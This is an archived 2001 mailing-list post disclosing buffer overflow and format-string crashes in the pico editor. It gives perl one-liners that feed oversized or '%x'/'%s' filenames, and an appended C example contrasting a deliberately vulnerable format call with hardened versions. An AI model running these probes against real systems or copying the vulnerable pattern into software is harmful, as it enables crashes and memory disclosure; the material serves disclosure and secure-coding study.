Vulnerability Development mailing list archives

Editor Overflows / Format Issues (pico)


From: elguapo <dotslash () snosoft com>
Date: Sun, 11 Nov 2001 20:50:57 -0500

Well, since the vi overflow generated some comments... same issue with
pico... again, not suid and probably useless, but here it is. As a side
note, this is a format string and buffer overflow issue.

This is on OpenUNIX 8:
$ pico `perl -e 'print "A" x 9000'`

   UW PICO(tm) 2.9                New Buffer

Memory fault(coredump)

Now, I have also seen systems where this does not work; however, use
of %s gets around this, as shown below.

This is on FreeBSD 4.4:
   UW PICO(tm) 4.0                New Buffer

                     [ Filename "AAAAAAAAAA..." too long ]

pico `perl -e 'print "%x" x 900'`
   UW PICO(tm) 4.0                New Buffer
  [ Filename "00000..." too long ]

pico `perl -e 'print "%s" x 40'`
   UW PICO(tm) 4.0                 File: %s%s%s%s
   UW PICO(tm) 4.0                New Buffer
Segmentation fault (core dumped)

On some versions I have seen %x or %p make pico show
[ Filename "0xbff7f..." too long ]
Usually, however, it shows 000000000 as the filename.

Any comments, other results, or possible uses of this issue?

-KF
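As an added illustration, not part of the original post and not pico's source, here is a constructed status-line routine in C showing both halves of what the post describes: a filename used directly as the format string (the bug "%x" and "%s" are probing), beside the hardened form that binds the name to a literal format and clips it, plus a bounded copy for the overflow half. MSG_MAX, the 10-character clip and the function names are assumptions. The only directive the example actually exercises at runtime is "%%", because feeding "%x" or "%s" to the vulnerable version with no arguments is undefined behaviour, which is exactly what the post observes as a string of zeros or a core dump.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the bug class in the post, NOT pico's source.
 * MSG_MAX, the 10-character clip and the function names are assumptions. */
#define MSG_MAX 80

/* Vulnerable pattern: the (attacker-controlled) filename is passed as the
 * format string itself, so "%x" dumps stack words into the status line and
 * "%s" dereferences them, which is the segfault the post shows.
 * Calling snprintf through a pointer only silences -Wformat-security so the
 * defect stays visible; in real code the fix is the function below. */
int status_vulnerable(char *out, size_t outsz, const char *name)
{
    int (*fmt)(char *, size_t, const char *, ...) = snprintf;
    return fmt(out, outsz, name);        /* BUG: name used as the format */
}

/* Hardened: a literal format, the untrusted string bound to a %.*s, and the
 * name clipped so the message always fits the buffer; no directive inside
 * the name is ever interpreted. */
int status_hardened(char *out, size_t outsz, const char *name)
{
    size_t shown = strlen(name);
    const char *ellipsis = "";
    if (shown > 10) {
        shown = 10;
        ellipsis = "...";
    }
    return snprintf(out, outsz, "[ Filename \"%.*s%s\" too long ]",
                    (int)shown, name, ellipsis);
}

/* Bounded copy for the overflow half of the post: refuse names that do not
 * fit instead of strcpy'ing 9000 bytes into a fixed buffer.
 * Returns 0 on success, -1 if the name (plus NUL) would not fit. */
int copy_name(char *dst, size_t dstsz, const char *name)
{
    size_t n = strlen(name);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, name, n + 1);
    return 0;
}

/* Quick oracle for a harness: does the name carry a %-directive that a
 * vulnerable status line would interpret? A trailing lone '%' is ignored. */
int has_format_directive(const char *name)
{
    const char *p = strchr(name, '%');
    return p != NULL && p[1] != '\0';
}

int main(void)
{
    char line[MSG_MAX];
    char name[64];

    /* "%%" is the one directive that consumes no argument, so it is a safe
     * way to prove the string is being interpreted as a format. */
    status_vulnerable(line, sizeof line, "New Buffer %%");
    printf("vulnerable: %s\n", line);   /* shows a single % */
    status_hardened(line, sizeof line, "a%%b");
    printf("hardened:   %s\n", line);   /* the %% survives verbatim */

    status_hardened(line, sizeof line,
                    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    printf("clipped:    %s\n", line);

    if (copy_name(name, sizeof name, "short.txt") == 0)
        printf("copied %s\n", name);
    if (copy_name(name, sizeof name,
                  "a-name-that-is-far-longer-than-the-sixty-four-byte-buffer-allows") != 0)
        printf("rejected oversize name\n");
    printf("directive in \"%%x%%x\": %d\n", has_format_directive("%x%x"));
    return 0;
}
```

When snprintf is called directly with a non-literal format and no arguments, gcc's -Wformat-security (or -Wformat=2) flags it; the pointer indirection above is there only to keep the vulnerable call compiling cleanly for the demonstration, and is itself a pattern to grep for in review.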


